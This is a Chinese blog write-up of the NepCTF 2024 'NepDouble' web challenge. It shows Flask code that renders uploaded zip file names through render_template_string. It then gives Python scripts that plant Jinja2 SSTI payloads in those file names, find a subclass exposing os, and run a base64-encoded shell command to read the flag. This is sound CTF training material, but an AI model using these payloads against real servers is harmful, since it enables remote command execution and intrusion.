Nepctf2024-Web-NepDouble

于 2024-09-01 21:23:22 发布
阅读量608 收藏
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sa1nZen/article/details/141790279
版权
一、题目
题目:NepDouble
题目描述:
二、WriteUp
1. 源码分析

# /
@app.route('/', methods=['GET', 'POST'])
def main():
    if request.method != "POST":
        return 'Please use POST method to upload files.'
    try:
        clear_uploads_folder()
        files = request.files.get('tp_file', None)
        if not files:
            return 'No file uploaded.'

        file_size = len(files.read())
        files.seek(0)

        file_extension = files.filename.rsplit('.', 1)[-1].lower()      # 判断是否为zip
        if file_extension != 'zip':
            return 'Invalid file type. Please upload a .zip file.'

        timestamp = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
        md5_dir_name = hashlib.md5(timestamp.encode()).hexdigest()
        unzip_folder = os.path.join(app.config['UPLOAD_FOLDER'], md5_dir_name)
        os.makedirs(unzip_folder, exist_ok=True)        # 创建时间戳md5文件夹

        with ZipFile(files) as zip_file:
            zip_file.extractall(path=unzip_folder)      # 解压文件

        files_list = []
        for root, dirs, files in os.walk(unzip_folder):
            for file in files:
                print(file)
                file_path = os.path.join(root, file)
                relative_path = os.path.relpath(file_path, app.config['UPLOAD_FOLDER'])
                link = f'<a href="/cat?file={relative_path}">{file}</a>'
                files_list.append(link)

        return render_template_string('<br>'.join(files_list))          # 漏洞函数
    except ValueError:
        return 'Invalid filename.'    
    except Exception as e:
        return 'An error occurred. Please check your file and try again.'

2. 功能测试

# 上传zip
import requests

file_path = './test.zip'
url = 'https://neptune-59769.nepctf.lemonprefect.cn/'

with open(file_path, 'rb') as f:
    files = {'tp_file': (file_path.split('/')[-1], f, 'application/zip')}
    response = requests.post(url, files=files)
print(response.text)

3. 访问<a href="/cat?file=5d547db16cff3d5848781938e9ec70ce/zipfile/1.jpg">1.jpg</a>

/cat?file=5d547db16cff3d5848781938e9ec70ce/zipfile/1.jpg
即得到文件内容

4. 漏洞函数

return render_template_string('<br>'.join(files_list))          # 漏洞函数
在渲染文件名时 可以进行python ssti模板注入

5. exp

# 测试版本 
import requests
import zipfile
import os
import re
import html

content_payload = 'whatever'
file_name = input("input filename:")    # 输入自定义
zip_file_name = 'payload.zip'
file_path = './payload.zip'
url = 'https://neptune-60709.nepctf.lemonprefect.cn'

with open(file_name, 'w') as f:
    f.write(content_payload)

with zipfile.ZipFile(zip_file_name, 'w') as zipf:
    zipf.write(file_name)

os.remove(file_name)

with open(file_path, 'rb') as f:
    files = {'tp_file': (file_path.split('/')[-1], f, 'application/zip')}
    response = requests.post(url, files=files)

os.remove(zip_file_name)
href = html.unescape(response.text)
print(href)

{{}}是表达式
# 可能的payload

{{''.__class__}}
{{''.__class__.__bases__[0].__subclasses__()[0].__init__.__globals__.keys()}}
{{''.__class__.__mro__[0].__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()[222].__init__}}   # <class 'warnings.catch_warnings'>
{{''.__class__.__mro__[1].__subclasses__()[209].__init__.__globals__.keys()}}
{{''.__class__.__mro__[1].__subclasses__()[209].__init__.__globals__["os"]["popen"]("ls").read()}}
{{''.__class__.__mro__[1].__subclasses__()[222].__init__.func_globals.values()[13]['eval']('__import__(\"os\").popen(\"ls\").read()')}}

# 测试哪些子类中包含os
import requests
import zipfile
import os
import re
import html

for i in range(1000):
    content_payload = 'whatever'
    file_name = "{{''.__class__.__mro__[1].__subclasses__()[" + str(i) +"].__init__.__globals__.keys()}}"
    zip_file_name = 'payload.zip'
    file_path = './payload.zip'
    url = 'https://neptune-42781.nepctf.lemonprefect.cn'

    with open(file_name, 'w') as f:
        f.write(content_payload)

    with zipfile.ZipFile(zip_file_name, 'w') as zipf:
        zipf.write(file_name)

    os.remove(file_name)

    with open(file_path, 'rb') as f:
        files = {'tp_file': (file_path.split('/')[-1], f, 'application/zip')}
        response = requests.post(url, files=files)

    os.remove(zip_file_name)
    href = html.unescape(response.text)
    if "\'os\'" in href:
        # print(href)
        print(i)

{{''.__class__.__mro__[1].__subclasses__()[209].__init__.__globals__['os']['popen']('ls').read()}}
在文件系统中,斜杠 / 被用作路径分隔符,因此它不能作为文件名的一部分。如果您尝试创建一个包含 / 的文件名,将会引发 FileNotFoundError 或者其它错误。

import requests
import zipfile
import os
import re
import html

content_payload = 'whatever'
# 使用base64对/进行绕过,然后使用bash执行
file_name = "{{''.__class__.__mro__[1].__subclasses__()[209].__init__.__globals__['os']['popen']('echo Y2F0IC9mbGFn|base64 -d|bash').read()}}"
zip_file_name = 'payload.zip'
file_path = './payload.zip'
url = 'https://neptune-60709.nepctf.lemonprefect.cn'

with open(file_name, 'w') as f:
    f.write(content_payload)

with zipfile.ZipFile(zip_file_name, 'w') as zipf:
    zipf.write(file_name)

os.remove(file_name)

with open(file_path, 'rb') as f:
    files = {'tp_file': (file_path.split('/')[-1], f, 'application/zip')}
    response = requests.post(url, files=files)

os.remove(zip_file_name)
href = html.unescape(response.text)
print(href)
三、总结
四、参考链接
Sa1nZen
关注
NepCTF2022-个人Writeup
m0_61596829的博客
07-17 1871
NepCTF2022-个人Writeup
NepCTF2022 WEB 博学多闻的花花详解
SHININGENDING的博客
07-18 1072
有意思的一道题
WebNepCTF 2024题解
uuzeray的博客
08-26 1205
这里要求存在一个用户NepNepIStheBestTeam,在前面就注册这个用户就能登录8080端口。找到拿字符串的html位置,手改成自己的 id,然后注册。第一个注册流程,无论给什么图片都是TEST。数据占用打崩,让服务重启反弹shell。对着CVE-2024-37084复现。参数不能带空格,用${IFS}flag在phpinfo里。start.sh有权限更改。反弹shell拿flag。upload.py上传。root权限读flag。zip包转字节列表脚本。在文件名处打SSTI。生成恶意文件名的文件。
NepCTF 2024 部分web
pwfortune的博客
08-31 1190
审计代码, render_template_string() 存在漏洞 渲染的是files_list , 里面存放的是文件名。查看etc/xinetd.d/看到pwnservice里面有个端口8888,并且这个可以写入,可以尝试利用8888进行连接。会存在一个反序列逃逸的漏洞, 经过替换之后, 字符会增多, 一次替换多出一个字符。照着ssti的思路写就行, 环境里面没有flag, 然后win的命名无法有。所以可以想到通过文件名来入手, 且需要上传的是一个zip文件。, 就无法列出根目录, 需要用到。
NepCTF2023--部分wp
qing_chuan_的博客
08-14 474
下载拿到piano.bin,是个音频文件,拉进Audacity看一下,发现有频谱,通过放大缩小频谱发现有字符串,将字符串抄写下来,钱一部分是摩斯密码,后部分是16进制。去搜Atsuko Kagari”,发现为小魔女学园动漫女主角,去看了动漫,发现里面有着文字,新月文字和古龙语,去上网找解释。这道题就是个游戏,就是自己和机器人下棋,你自己先先连出来42和5子棋就可得到flag,不想在复现一遍了。题目说是一种很老的cve,题目又是java-checkin,上网搜,找到一个跟java有关得cve。
NepCTF2021-Web部分(除画皮)
Y4tacker的博客
03-22 3406
文章目录little_trickfaka_revengeEasy_Tomcatbbxhh_revenge非预期预期 little_trick 打开环境发现代码是这个,太简单了,签到题 <?php error_reporting(0); highlight_file(__FILE__); $nep = $_GET['nep']; $len = $_GET['len']; if(intval($len)<8 && strlen($nep)&lt
NepCTF web-little_trick
qq_34097497的博客
03-22 660
NepCTF web-little_trick 小白第一次写write up大佬别喷 0x01 原理分析 题目分析 题目中主要考察eval 利用 打开PHP手册 当len参数为 -1时,可以构造最多12个字符,回想到之前学习到的eval长度限制绕过 0x02 漏洞利用 ps:反引号`` 内的字符串,也会被解析成OS 命令。 例如 <pre> <?php if(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; print `$cmd`;
NepCTF2023-misc方向wp
toto的博客
08-14 913
(伸出脑袋,凑近群名,轻轻的闻了一下)哇,好咸诶,开拓者你快来看看!Nepnep星球如约举办CTF大赛,消息传播至各大星球,开拓者一行人应邀而来 ———————————————————————————————————————开拓者(U_id):(端着下巴,磨蹭了一下,眼神若有所思)这好像需要经过啥256处理一下才能得到我们需要的关键。然后16个一组画图,这时候画出来的图有一定的偏移,开头再添加5个6画的就很好了。限时10分钟,玩到42分就好了,直接手动玩就行了,电脑方挺笨的,没啥考点可言。
2024NepCTF web复现
2301_80913334的博客
09-01 890
根据代码,整理出流程为:登入HRP用户(余额6000)->重置->获取其他用户(随机生成,余额2000)->利用多线程转账给随机生成的用户->购买admin用户的密码(密码值10000)->登入admin用户->上传文件lock.txt->执行cmd命令得到flag。file={relative_path}">{file}</a>渲染网页,所以我们可以用脚本进行连接并上传一个带有ssti的payload的zip文件。查看/etc目录发现conf文件和一个xinetd.d目录。查看当前路径,目录和用户。
2021NepCTF REVERSE-Hardcsharp Writeup
Nu1bzzi的博客
03-22 430
2021NepCTF REVERSE-Hardcsharp 首先拿到文件第一步用PEiD查壳(养成好习惯) 什么都没找到QAQ,萌新只知道是32位的程序于是顺手放进IDA进行分析 在放入时发现该程序是由.NET做的 进入后点进jmp后的函数果然发现了熟悉的东西 直接放入Dnspy中进行分析(Dnspy的详细使用方法和下载地址在这里????QAQ) 一个个点开之后发现我们要分析的主要函数在@02000002中 而我们需要注意的是这部分的运算 由for循环函数可知array[]数组中每一项都与51做了
NepCTF比赛官方writeup1
08-04
NepCTF比赛官方writeup1
[NepCTF]WEB
Huamang的博客
03-23 611
梦里花开牡丹亭 涉及到: pop链 命令执行 短字符命令执行 反序列化,代码审计 <?php highlight_file(__FILE__); error_reporting(0); include('shell.php'); class Game{ public $username; public $password; public $choice; public $register; public $file; public $fi
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8538
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Java核心技术.卷2.高级特性.原书第12版.中文
11-08
Java核心技术.卷2.高级特性.原书第12版.中文
【java毕业设计】springboot共享经济背景下校园闲置物品交易平台(springboot+mysql+说明文档).zip
11-08
项目经过测试均可完美运行! 环境说明: 开发语言:java 框架:ssm jdk版本:jdk1.8 数据库:mysql 5.7+ 数据库工具:Navicat11+ 管理工具:maven 开发工具:idea/eclipse 部署容器:tomcat7+
anscombe.csv
最新发布
11-08
anscombe
大模型备案推进,AI生成内容商业化进程加快
11-08
内容概要:文章介绍了自2023年8月以来中国AIGC领域的最新动态和发展趋势,强调了百度、商汤等公司在大模型方面的重要进展及备案工作的积极影响。具体而言,国家网信办发布的《生成式人工智能服务管理办法(征求意见稿)》标志着政策对大模型的规范化管理进入实施阶段,促进了AIGC从技术研发走向商业化应用的步伐。此外,报告还列出了多个上市公司的中期财报,展示它们在此转型期内的业绩变化情况。 适合人群:对AI及计算机视觉感兴趣的研究者、开发者以及企业管理人员。 使用场景及目标:适用于希望了解当前AIGC领域发展趋势和政策环境的机构和个人;旨在帮助投资者识别潜在投资机会。 其他说明:尽管许多公司取得了良好的进展,但也提醒关注供应链、政策支持及国内替代等风险因素。
基于Android ——MyDate 好看的日历,效果明显。.zip
11-08
内容概要:本资源聚焦 Android 编程实战,包含毕业设计示例、完整的 Android 项目源码及文档分享。采用 MVC 模式进行架构设计,结合 JSP 技术与 SQL Server 2000 数据库管理系统,实现高效的 Android 应用开发。 适用人群:Android 开发初学者、计算机专业学生进行毕业设计参考、希望提升 Android 开发技能的程序员。 实用场景及目标:适用于开发各类 Android 应用项目,帮助开发者快速构建稳定、功能丰富的应用程序,同时为毕业设计提供优质的模板和思路。 说明:资源提供了详细的代码注释和文档说明,方便学习者理解和上手,助力提升 Android 开发能力和项目实战经验。
大学心理咨询管理子系统 SSM毕业设计 附带论文.zip
11-08
大学心理咨询管理子系统 SSM毕业设计 附带论文 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
welcome_CAT_CTF
07-28
- *2* *3* [NepCTF2022 WP](https://blog.csdn.net/not_code_god/article/details/125883979)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值